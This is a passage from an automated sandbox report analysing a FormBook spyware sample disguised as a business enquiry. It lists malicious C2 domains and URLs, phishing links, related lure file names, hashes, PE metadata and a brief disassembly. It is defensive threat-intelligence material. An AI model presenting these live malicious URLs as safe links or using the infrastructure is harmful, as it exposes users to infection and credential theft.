                          https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchnetbtugc.exe, 00000006.00000002.3349934209.00000000082C8000.00000004.00000020.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=netbtugc.exe, 00000006.00000002.3349934209.00000000082C8000.00000004.00000020.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=netbtugc.exe, 00000006.00000002.3349934209.00000000082C8000.00000004.00000020.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          https://www.ecosia.org/newtab/netbtugc.exe, 00000006.00000002.3349934209.00000000082C8000.00000004.00000020.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          https://www.masteriocp.online/p5rq/?GHSh-Tth=RytyLV2sDE3KAjid6ijyBws804BTuHo2xv60Q0DZuFoqqvUh/Zvb/zRnetbtugc.exe, 00000006.00000002.3348221729.0000000004638000.00000004.10000000.00040000.00000000.sdmp, rYmePGTGlPk.exe, 00000007.00000002.3347857669.0000000003608000.00000004.00000001.00040000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=netbtugc.exe, 00000006.00000002.3349934209.00000000082C8000.00000004.00000020.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown

                          World Map of Contacted IPs

                          • No. of IPs < 25%
                          • 25% < No. of IPs < 50%
                          • 50% < No. of IPs < 75%
                          • 75% < No. of IPs

                          Public IPs

                          IPDomainCountryFlagASNASN NameMalicious
                          66.81.203.10
                          		www.mediaplug.bizVirgin Islands (BRITISH)
                          		40034CONFLUENCE-NETWORK-INCVGtrue
                          13.228.81.39
                          		dns.ladipage.comUnited States
                          		16509AMAZON-02UStrue
                          103.42.108.46
                          		www.independent200.orgAustralia
                          		45638SYNERGYWHOLESALE-APSYNERGYWHOLESALEPTYLTDAUtrue
                          3.33.130.190
                          		chamadaslotgiris.netUnited States
                          		8987AMAZONEXPANSIONGBtrue

                          General Information

                          Joe Sandbox version:40.0.0 Tourmaline
                          Analysis ID:1510735
                          Start date and time:2024-09-13 12:01:10 +02:00
                          Joe Sandbox product:CloudBasic
                          Overall analysis duration:0h 8m 35s
                          Hypervisor based Inspection enabled:false
                          Report type:full
                          Cookbook file name:default.jbs
                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                          Number of analysed new started processes analysed:7
                          Number of new started drivers analysed:0
                          Number of existing processes analysed:0
                          Number of existing drivers analysed:0
                          Number of injected processes analysed:2
                          Technologies:
                          • HCA enabled
                          • EGA enabled
                          • AMSI enabled
                          Analysis Mode:default
                          Analysis stop reason:Timeout
                          Sample name:r3T-ENQ-O-2024-10856.exe
                          Detection:MAL
                          Classification:mal100.troj.spyw.evad.winEXE@7/3@13/4
                          EGA Information:
                          • Successful, ratio: 75%
                          HCA Information:
                          • Successful, ratio: 92%
                          • Number of executed functions: 56
                          • Number of non-executed functions: 282
                          Cookbook Comments:
                          • Found application associated with file extension: .exe

                          Warnings

                          • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                          • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, dns.msftncsi.com, fe3cr.delivery.mp.microsoft.com
                          • Report creation exceeded maximum time and may have missing disassembly code information.
                          • Report size exceeded maximum capacity and may have missing disassembly code.
                          • VT rate limit hit for: r3T-ENQ-O-2024-10856.exe

                          Simulations

                          Behavior and APIs

                          TimeTypeDescription
                          06:03:34API Interceptor552462x Sleep call for process: netbtugc.exe modified

                          Joe Sandbox View / Context

                          IPs

                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          66.81.203.103T-ENQ-O-2024-10856.exeGet hashmaliciousFormBookBrowse
                          • www.mediaplug.biz/osde/
                          13.228.81.39SecuriteInfo.com.Win32.Malware-gen.24953.22588.exeGet hashmaliciousFormBookBrowse
                          • www.tmstore.click/xme5/?RD4=n0CKpMQN4gGZ92M5/3EtOcSUkm26Kn20yY4QJn1V5vv9XAZ2vYFLUkiK71x3Mm43WM97SNcNOsfAT2BrwuTBRE9eXvmWucLueMGlkNS8dNMHocOVM3LStbA=&VzA=dz5HvTSP4ZdlFHDP
                          z11SOAAUG2408.exeGet hashmaliciousFormBookBrowse
                          • www.masteriocp.online/p5rq/
                          REQUEST FOR QUOTATION.exeGet hashmaliciousFormBook, GuLoaderBrowse
                          • www.masteriocp.online/wg84/
                          Proforma_Invoice.pif.exeGet hashmaliciousFormBookBrowse
                          • www.againbeautywhiteskin.asia/3h10/
                          Arrival Notice.bat.exeGet hashmaliciousFormBookBrowse
                          • www.againbeautywhiteskin.asia/3h10/
                          Arrival Notice.bat.exeGet hashmaliciousFormBookBrowse
                          • www.againbeautywhiteskin.asia/3h10/
                          ORDER TKHA-A88163341B.bat.exeGet hashmaliciousFormBookBrowse
                          • www.againbeautywhiteskin.asia/3h10/
                          Purchase Order #PO-240902.vbsGet hashmaliciousFormBookBrowse
                          • www.hisako.store/55sn/
                          Arrival Notice.bat.exeGet hashmaliciousFormBookBrowse
                          • www.againbeautywhiteskin.asia/3h10/
                          P1 HWT623ATG.bat.exeGet hashmaliciousFormBook, GuLoaderBrowse
                          • www.againbeautywhiteskin.asia/3h10/
                          103.42.108.463T-ENQ-O-2024-10856.exeGet hashmaliciousFormBookBrowse
                          • www.independent200.org/yl6y/
                          New Purchase Order.exeGet hashmaliciousFormBookBrowse
                          • www.mbwd.store/pn1r/?lt=gKnM/UYa57ur7VVzNcvkzBuMpwTVzE14/GtRoFWV9RJaxqyHi91lxRYvKS9XNcGV9MGsPko/NpaB+uWz1UCX1wHhyYSOikvVIVM8anokYkTUErXORgkeTZM=&3ry=nj20Xr
                          Scan 00093847.exeGet hashmaliciousFormBookBrowse
                          • www.mbwd.store/pn1r/
                          LKkVS1VFJD.exeGet hashmaliciousFormBookBrowse
                          • www.independent200.org/peuo/
                          rRFQ.bat.exeGet hashmaliciousFormBookBrowse
                          • www.mbwd.store/bmmx/
                          REQUEST FOR QUOTATION.exeGet hashmaliciousFormBook, GuLoaderBrowse
                          • www.mbwd.store/pn1r/
                          TNT Express Arrival Notice AWB 8013580 1182023_PDF_.exeGet hashmaliciousFormBookBrowse
                          • www.mtmoriacolives.store/bkj6/
                          6ddrUd6iQo.exeGet hashmaliciousFormBookBrowse
                          • www.eastcoastev.site/51n1/
                          INV90097.exeGet hashmaliciousFormBookBrowse
                          • www.anzskincare.xyz/n1ua/
                          Electronic Order.exeGet hashmaliciousFormBookBrowse
                          • www.dtalusering.com/la5g/

                          Domains

                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          dns.ladipage.comSecuriteInfo.com.Win32.Malware-gen.24953.22588.exeGet hashmaliciousFormBookBrowse
                          • 13.228.81.39
                          3T-ENQ-O-2024-10856.exeGet hashmaliciousFormBookBrowse
                          • 18.139.62.226
                          New Purchase Order.exeGet hashmaliciousFormBookBrowse
                          • 54.179.173.60
                          Scan 00093847.exeGet hashmaliciousFormBookBrowse
                          • 18.139.62.226
                          z11SOAAUG2408.exeGet hashmaliciousFormBookBrowse
                          • 13.228.81.39
                          REQUEST FOR QUOTATION.exeGet hashmaliciousFormBook, GuLoaderBrowse
                          • 13.228.81.39
                          DN.exeGet hashmaliciousFormBookBrowse
                          • 18.139.62.226
                          https://www.newbalancestore.asia/nb530.nh?utm_source=saleGet hashmaliciousUnknownBrowse
                          • 13.228.81.39
                          DHL_497104778908.exeGet hashmaliciousFormBookBrowse
                          • 18.139.62.226
                          Shipping Documents 7896424100.exeGet hashmaliciousFormBookBrowse
                          • 13.228.81.39
                          www.independent200.org3T-ENQ-O-2024-10856.exeGet hashmaliciousFormBookBrowse
                          • 103.42.108.46
                          LKkVS1VFJD.exeGet hashmaliciousFormBookBrowse
                          • 103.42.108.46
                          www.mediaplug.biz3T-ENQ-O-2024-10856.exeGet hashmaliciousFormBookBrowse
                          • 66.81.203.10
                          Jsn496Em5T.exeGet hashmaliciousFormBookBrowse
                          • 66.81.203.135
                          6i4QCFbsNi.exeGet hashmaliciousFormBookBrowse
                          • 66.81.203.200
                          Curriculum Vitae.exeGet hashmaliciousFormBookBrowse
                          • 66.81.203.200
                          z11SOAAUG2408.exeGet hashmaliciousFormBookBrowse
                          • 66.81.203.200
                          DN.exeGet hashmaliciousFormBookBrowse
                          • 66.81.203.135
                          Filename.exeGet hashmaliciousDarkTortilla, FormBookBrowse
                          • 66.81.203.200

                          ASNs

                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          AMAZON-02USWrall.exeGet hashmaliciousUnknownBrowse
                          • 3.5.216.50
                          809768765454654.exeGet hashmaliciousFormBookBrowse
                          • 35.154.47.49
                          https://www.google.com/url?q=3HOSozuuQiApLjODz3yh&rct=tTPSJ3J3wDFX0jkXyycT&sa=t&esrc=WSECxFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ9mfdQ6lDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2Faggarwaltradersindia.in%2Fskoda%2FX3HOVMfsCLBJWP5GhJNdLWwq/bmlyYXYuZGVzYWlAbHJxYS5jb20=Get hashmaliciousHTMLPhisherBrowse
                          • 52.29.121.189
                          https://l.co.ukGet hashmaliciousUnknownBrowse
                          • 35.165.241.124
                          https://andersonattack.com#suthra@oneazcu.com?client_id=email=suthra%40oneazcu.com&fname=&lname=&rid=IRXTDhDszfpTc61bxRYlWAueOHqUt8ZGet hashmaliciousHTMLPhisherBrowse
                          • 63.32.164.83
                          http://telstra-109219.weeblysite.com/Get hashmaliciousHTMLPhisherBrowse
                          • 54.201.194.161
                          http://metsmklogin.gitbook.io/Get hashmaliciousUnknownBrowse
                          • 34.252.37.84
                          http://gegimini-loggiyn.gitbook.io/Get hashmaliciousUnknownBrowse
                          • 34.252.37.84
                          http://uphaild-login.gitbook.io/Get hashmaliciousUnknownBrowse
                          • 34.252.37.84
                          http://axxn-5yor.vercel.app/blog1/Get hashmaliciousUnknownBrowse
                          • 76.76.21.22
                          SYNERGYWHOLESALE-APSYNERGYWHOLESALEPTYLTDAU3T-ENQ-O-2024-10856.exeGet hashmaliciousFormBookBrowse
                          • 103.42.108.46
                          New Purchase Order.exeGet hashmaliciousFormBookBrowse
                          • 103.42.108.46
                          Scan 00093847.exeGet hashmaliciousFormBookBrowse
                          • 103.42.108.46
                          firmware.sh4.elfGet hashmaliciousUnknownBrowse
                          • 103.27.32.30
                          LKkVS1VFJD.exeGet hashmaliciousFormBookBrowse
                          • 103.42.108.46
                          http://www.greenprintlandscapes.com.auGet hashmaliciousUnknownBrowse
                          • 110.232.143.97
                          http://fslink.megnagroup.com.au/email/track/click?hash=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjp7Im11c3RoIjoiaHR0cHM6Ly9tZWduYWdyb3VwLmNvbS5hdS8iLCJsaW9uIjoiNzVkNGMiLCJnb3JpbGxhIjoiYmE1MDZjM2NlIiwidGlnZXIiOiJmc2xpbmsubWVnbmFncm91cC5jb20uYXUifSwiaWF0IjoxNzI0OTg3NTgyfQ.q2Cl712fuiOGcrrlV8jnMlRPUIhIoDJ0d2m4R_WTYLA~eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjp7ImhvcnNlIjoia2V2aW4uc21pdGhAc2FuaXRhcml1bS5jb20uYXUiLCJjYW1lbCI6ImJhNmM1MDlmZSJ9LCJpYXQiOjE3MjQ5ODc1ODJ9.KTlm-RKp1KYEIDipXUGHrWZz7AycFi0jesA9WqoLoigGet hashmaliciousUnknownBrowse
                          • 110.232.143.78
                          rRFQ.bat.exeGet hashmaliciousFormBookBrowse
                          • 103.42.108.46
                          REQUEST FOR QUOTATION.exeGet hashmaliciousFormBook, GuLoaderBrowse
                          • 103.42.108.46
                          RFQ-HL51L05.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                          • 110.232.143.114
                          CONFLUENCE-NETWORK-INCVGSecuriteInfo.com.Win32.Malware-gen.24953.22588.exeGet hashmaliciousFormBookBrowse
                          • 208.91.197.27
                          New Purchase Order.exeGet hashmaliciousFormBookBrowse
                          • 208.91.197.27
                          r9856_7.exeGet hashmaliciousFormBookBrowse
                          • 208.91.197.13
                          3T-ENQ-O-2024-10856.exeGet hashmaliciousFormBookBrowse
                          • 66.81.203.10
                          BCNFNjvJNq.exeGet hashmaliciousADWIND, Lokibot, Ramnit, SalityBrowse
                          • 204.11.56.48
                          Jsn496Em5T.exeGet hashmaliciousFormBookBrowse
                          • 66.81.203.135
                          EGCS-875-S5-SMO M2A.exeGet hashmaliciousFormBookBrowse
                          • 208.91.197.27
                          OjKmJJm2YT.exeGet hashmaliciousSimda StealerBrowse
                          • 199.191.50.83
                          5AFlyarMds.exeGet hashmaliciousSimda StealerBrowse
                          • 199.191.50.83
                          uB31aJH4M0.exeGet hashmaliciousSimda StealerBrowse
                          • 199.191.50.83

                          JA3 Fingerprints

                          No context

                          Dropped Files

                          No context

                          Created / dropped Files

                          C:\Users\user\AppData\Local\Temp\1m0Sa73J8

                          Download File
                          Process:C:\Windows\SysWOW64\netbtugc.exe
                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                          Category:dropped
                          Size (bytes):196608
                          Entropy (8bit):1.121297215059106
                          Encrypted:false
                          SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                          MD5:D87270D0039ED3A5A72E7082EA71E305
                          SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                          SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                          SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                          Malicious:false
                          Reputation:high, very likely benign file
                          Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                          C:\Users\user\AppData\Local\Temp\aut1F71.tmp

                          Download File
                          Process:C:\Users\user\Desktop\r3T-ENQ-O-2024-10856.exe
                          File Type:data
                          Category:dropped
                          Size (bytes):287744
                          Entropy (8bit):7.995084106275985
                          Encrypted:true
                          SSDEEP:6144:P2giArNGx3FAFL6uCg19gk59YG86uQg+IyDNTNOx8vtDUSBGhnmMloB:P8jsWuCNE9A6uv+IyfG8vtFBZMloB
                          MD5:8CDA2E243ED77483F56F826B52C2825F
                          SHA1:0EA2FDFA8C418333781E893AF626C7FDFFA965EB
                          SHA-256:D7D9AB408CCC9FC969D45D7981EEA335064125BB048B1DD5D8DF858D190CCF14
                          SHA-512:C35E70A52C40ACCD12B8C3E3F37C4A2876D004520D4F9CFB1FF1F9F2EA689559FA36B4CDDC8D415198F7FF2CEC5BCBB63AC204339E8CE72E6360B4DF6E81F4B6
                          Malicious:false
                          Reputation:low
                          Preview:~....KTWRj..Q.....PP....2Q...BOG1KTWR2M8XFV873TPSRS591YWM3B.G1KZH.<M.Q.w.6..q.::F.A+8*A#"gR*:9=FmZ=f$MY.=>s..f.\63(.OBM.KTWR2M8!G_..S3.n24..Q>.W..}Q,.M....8!."...l35.gPR1j-T.OG1KTWR2.}XF.963..S591YWM3.OE0@U\R2.<XFV873TPS2G591IWM32KG1K.WR"M8XDV813TPSRS5?1YWM3BOGAOTWP2M8XFV:7s.PSBS5)1YWM#BOW1KTWR2]8XFV873TPSRS591YWM3BOG1KTWR2M8XFV873TPSRS591YWM3BOG1KTWR2M8XFV873TPSRS591YWM3BOG1KTWR2M8XFV873TPSRS591YWM3BOG1KTWR2M8XFV873TPSRS591w#(K6OG1..SR2]8XF.<73DPSRS591YWM3BOG.KT7R2M8XFV873TPSRS591YWM3BOG1KTWR2M8XFV873TPSRS591YWM3BOG1KTWR2M8XFV873TPSRS591YWM3BOG1KTWR2M8XFV873TPSRS591YWM3BOG1KTWR2M8XFV873TPSRS591YWM3BOG1KTWR2M8XFV873TPSRS591YWM3BOG1KTWR2M8XFV873TPSRS591YWM3BOG1KTWR2M8XFV873TPSRS591YWM3BOG1KTWR2M8XFV873TPSRS591YWM3BOG1KTWR2M8XFV873TPSRS591YWM3BOG1KTWR2M8XFV873TPSRS591YWM3BOG1KTWR2M8XFV873TPSRS591YWM3BOG1KTWR2M8XFV873TPSRS591YWM3BOG1KTWR2M8XFV873TPSRS591YWM3BOG1KTWR2M8XFV873TPSRS591YWM3BOG1KTWR2M8XFV873TPSRS591YWM3BOG1KTWR2M8XFV873TPSRS591YWM3BOG1KTWR2M8XFV873TPSRS591YWM3BOG1KTWR2M8XF

                          C:\Users\user\AppData\Local\Temp\wherefore

                          Download File
                          Process:C:\Users\user\Desktop\r3T-ENQ-O-2024-10856.exe
                          File Type:data
                          Category:dropped
                          Size (bytes):287744
                          Entropy (8bit):7.995084106275985
                          Encrypted:true
                          SSDEEP:6144:P2giArNGx3FAFL6uCg19gk59YG86uQg+IyDNTNOx8vtDUSBGhnmMloB:P8jsWuCNE9A6uv+IyfG8vtFBZMloB
                          MD5:8CDA2E243ED77483F56F826B52C2825F
                          SHA1:0EA2FDFA8C418333781E893AF626C7FDFFA965EB
                          SHA-256:D7D9AB408CCC9FC969D45D7981EEA335064125BB048B1DD5D8DF858D190CCF14
                          SHA-512:C35E70A52C40ACCD12B8C3E3F37C4A2876D004520D4F9CFB1FF1F9F2EA689559FA36B4CDDC8D415198F7FF2CEC5BCBB63AC204339E8CE72E6360B4DF6E81F4B6
                          Malicious:false
                          Reputation:low
                          Preview:~....KTWRj..Q.....PP....2Q...BOG1KTWR2M8XFV873TPSRS591YWM3B.G1KZH.<M.Q.w.6..q.::F.A+8*A#"gR*:9=FmZ=f$MY.=>s..f.\63(.OBM.KTWR2M8!G_..S3.n24..Q>.W..}Q,.M....8!."...l35.gPR1j-T.OG1KTWR2.}XF.963..S591YWM3.OE0@U\R2.<XFV873TPS2G591IWM32KG1K.WR"M8XDV813TPSRS5?1YWM3BOGAOTWP2M8XFV:7s.PSBS5)1YWM#BOW1KTWR2]8XFV873TPSRS591YWM3BOG1KTWR2M8XFV873TPSRS591YWM3BOG1KTWR2M8XFV873TPSRS591YWM3BOG1KTWR2M8XFV873TPSRS591YWM3BOG1KTWR2M8XFV873TPSRS591w#(K6OG1..SR2]8XF.<73DPSRS591YWM3BOG.KT7R2M8XFV873TPSRS591YWM3BOG1KTWR2M8XFV873TPSRS591YWM3BOG1KTWR2M8XFV873TPSRS591YWM3BOG1KTWR2M8XFV873TPSRS591YWM3BOG1KTWR2M8XFV873TPSRS591YWM3BOG1KTWR2M8XFV873TPSRS591YWM3BOG1KTWR2M8XFV873TPSRS591YWM3BOG1KTWR2M8XFV873TPSRS591YWM3BOG1KTWR2M8XFV873TPSRS591YWM3BOG1KTWR2M8XFV873TPSRS591YWM3BOG1KTWR2M8XFV873TPSRS591YWM3BOG1KTWR2M8XFV873TPSRS591YWM3BOG1KTWR2M8XFV873TPSRS591YWM3BOG1KTWR2M8XFV873TPSRS591YWM3BOG1KTWR2M8XFV873TPSRS591YWM3BOG1KTWR2M8XFV873TPSRS591YWM3BOG1KTWR2M8XFV873TPSRS591YWM3BOG1KTWR2M8XFV873TPSRS591YWM3BOG1KTWR2M8XF

                          Static File Info

                          General

                          File type:PE32 executable (GUI) Intel 80386, for MS Windows
                          Entropy (8bit):7.162279986205745
                          TrID:
                          • Win32 Executable (generic) a (10002005/4) 99.96%
                          • Generic Win/DOS Executable (2004/3) 0.02%
                          • DOS Executable Generic (2002/1) 0.02%
                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                          File name:r3T-ENQ-O-2024-10856.exe
                          File size:1'225'728 bytes
                          MD5:52ef22af5530fe6362d8638583866c7f
                          SHA1:bf344e2b57cf1faea3c523212fa0aee1a99a3a6a
                          SHA256:122c7d2d307d52030eb2021410912b9cf3af46ee3f25a9fd8869f22a8a0baff9
                          SHA512:4da7dccbe49c00ce1eaf8cc80e230771f4fcd0668887bb212b0713e1c85ee86a880adaaced7009cd9214a2fc5cfebedab8c2f08e9fea4287aebfc31711713c19
                          SSDEEP:24576:A4lavt0LkLL9IMixoEgeaiuQZQehpmZfjuYcV8Y7Ebq9MmCS:3kwkn9IMHeaipNuuYMjSaPCS
                          TLSH:5845C01373DDC3A1C3725273BA65BB01AEBB7C2506A1F59B2FD4093DE920162921E673
                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......S................g..........$...............%.....H.......X.2...........q)..Z...q)......q)........\.....q)......Rich...........

                          File Icon

                          Icon Hash:aaf3e3e3938382a0

                          Static PE Info

                          General

                          Entrypoint:0x426bf7
                          Entrypoint Section:.text
                          Digitally signed:false
                          Imagebase:0x400000
                          Subsystem:windows gui
                          Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                          DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                          Time Stamp:0x66E224FA [Wed Sep 11 23:17:14 2024 UTC]
                          TLS Callbacks:
                          CLR (.Net) Version:
                          OS Version Major:5
                          OS Version Minor:1
                          File Version Major:5
                          File Version Minor:1
                          Subsystem Version Major:5
                          Subsystem Version Minor:1
                          Import Hash:bbac62fd99326ea68ec5a33b36925dd1

                          Entrypoint Preview

                          Instruction
                          call 00007F83ACC3E7FCh
                          jmp 00007F83ACC316E4h
                          int3
                          int3
                          int3
                          int3
                          int3
                          int3
                          int3
                          int3
                          int3
                          int3
                          int3
                          int3
                          int3
                          int3
                          int3
                          push edi
                          push esi
                          mov esi, dword ptr [esp+10h]
                          mov ecx, dword ptr [esp+14h]
                          mov edi, dword ptr [esp+0Ch]
                          mov eax, ecx
                          mov edx, ecx
                          add eax, esi
                          cmp edi, esi
                          jbe 00007F83ACC3186Ah
                          cmp edi, eax
                          jc 00007F83ACC31BCEh
                          bt dword ptr [004C0158h], 01h
                          jnc 00007F83ACC31869h
                          rep movsb
                          jmp 00007F83ACC31B7Ch
                          cmp ecx, 00000080h
                          jc 00007F83ACC31A34h
                          mov eax, edi
                          xor eax, esi
                          test eax, 0000000Fh
                          jne 00007F83ACC31870h
                          bt dword ptr [004BA370h], 01h
                          jc 00007F83ACC31D40h
                          bt dword ptr [004C0158h], 00000000h
                          jnc 00007F83ACC31A0Dh
                          test edi, 00000003h
                          jne 00007F83ACC31A1Eh
                          test esi, 00000003h
                          jne 00007F83ACC319FDh
                          bt edi, 02h
                          jnc 00007F83ACC3186Fh
                          mov eax, dword ptr [esi]
                          sub ecx, 04h
                          lea esi, dword ptr [esi+04h]
                          mov dword ptr [edi], eax
                          lea edi, dword ptr [edi+04h]
                          bt edi, 03h
                          jnc 00007F83ACC31873h
                          movq xmm1, qword ptr [esi]
                          sub ecx, 08h
                          lea esi, dword ptr [esi+08h]
                          movq qword ptr [edi], xmm1
                          lea edi, dword ptr [edi+08h]
                          test esi, 00000007h
                          je 00007F83ACC318C5h

                          Rich Headers

                          Programming Language:
                          • [ C ] VS2008 SP1 build 30729
                          • [IMP] VS2008 SP1 build 30729
                          • [ASM] VS2012 UPD4 build 61030
                          • [RES] VS2012 UPD4 build 61030
                          • [LNK] VS2012 UPD4 build 61030

                          Data Directories

                          NameVirtual AddressVirtual Size Is in Section
                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                          IMAGE_DIRECTORY_ENTRY_IMPORT0xb6b6c0x17c.rdata
                          IMAGE_DIRECTORY_ENTRY_RESOURCE0xc40000x61f54.rsrc
                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x1260000x6c20.reloc
                          IMAGE_DIRECTORY_ENTRY_DEBUG0x8d8d00x1c.rdata
                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0xb27700x40.rdata
                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                          IMAGE_DIRECTORY_ENTRY_IAT0x8d0000x858.rdata
                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                          Sections

                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                          .text0x10000x8be740x8c00074af66fa540568c59b3868e78900e476False0.5690970284598215data6.681489717174931IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                          .rdata0x8d0000x2c76a0x2c800576c856afaad699ad9fe099fc6a9ce33False0.33122476299157305zlib compressed data5.781163507108141IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                          .data0xba0000x9f340x6200e6d2e204147f7cdc3055011093632f54False0.1639030612244898data2.004392861291539IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                          .rsrc0xc40000x61f540x6200027e6b8a9e26174e545852ef38602d313False0.9331528021364796data7.90494053334378IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                          .reloc0x1260000xa4620xa600c2f6ddaeef894b7510c3be928eeae5ddFalse0.5080948795180723data5.238496692777452IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                          Resources

                          NameRVASizeTypeLanguageCountryZLIB Complexity
                          RT_ICON0xc45a80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.7466216216216216
                          RT_ICON0xc46d00x128Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colorsEnglishGreat Britain0.3277027027027027
                          RT_ICON0xc47f80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.3885135135135135
                          RT_ICON0xc49200x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 0EnglishGreat Britain0.3333333333333333
                          RT_ICON0xc4c080x128Device independent bitmap graphic, 16 x 32 x 4, image size 0EnglishGreat Britain0.5
                          RT_ICON0xc4d300xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0EnglishGreat Britain0.2835820895522388
                          RT_ICON0xc5bd80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0EnglishGreat Britain0.37906137184115524
                          RT_ICON0xc64800x568Device independent bitmap graphic, 16 x 32 x 8, image size 0EnglishGreat Britain0.23699421965317918
                          RT_ICON0xc69e80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0EnglishGreat Britain0.13858921161825727
                          RT_ICON0xc8f900x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0EnglishGreat Britain0.25070356472795496
                          RT_ICON0xca0380x468Device independent bitmap graphic, 16 x 32 x 32, image size 0EnglishGreat Britain0.3173758865248227
                          RT_MENU0xca4a00x50dataEnglishGreat Britain0.9
                          RT_STRING0xca4f00x594dataEnglishGreat Britain0.3333333333333333
                          RT_STRING0xcaa840x68adataEnglishGreat Britain0.2747909199522103
                          RT_STRING0xcb1100x490dataEnglishGreat Britain0.3715753424657534
                          RT_STRING0xcb5a00x5fcdataEnglishGreat Britain0.3087467362924282
                          RT_STRING0xcbb9c0x65cdataEnglishGreat Britain0.34336609336609336
                          RT_STRING0xcc1f80x466dataEnglishGreat Britain0.3605683836589698
                          RT_STRING0xcc6600x158Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0EnglishGreat Britain0.502906976744186
                          RT_RCDATA0xcc7b80x591f1data1.0003314696157417
                          RT_GROUP_ICON0x1259ac0x76dataEnglishGreat Britain0.6610169491525424
                          RT_GROUP_ICON0x125a240x14dataEnglishGreat Britain1.25
                          RT_GROUP_ICON0x125a380x14dataEnglishGreat Britain1.15
                          RT_GROUP_ICON0x125a4c0x14dataEnglishGreat Britain1.25
                          RT_VERSION0x125a600x144dataEnglishGreat Britain0.5895061728395061
                          RT_MANIFEST0x125ba40x3b0ASCII text, with CRLF line terminatorsEnglishGreat Britain0.5116525423728814

                          Imports

                          DLLImport
                          WSOCK32.dll__WSAFDIsSet, recv, send, setsockopt, ntohs, recvfrom, select, WSAStartup, htons, accept, listen, bind, closesocket, connect, WSACleanup, ioctlsocket, sendto, WSAGetLastError, inet_addr, gethostbyname, gethostname, socket
                          VERSION.dllGetFileVersionInfoW, VerQueryValueW, GetFileVersionInfoSizeW
                          WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
                          COMCTL32.dllImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, ImageList_Create, InitCommonControlsEx, ImageList_ReplaceIcon
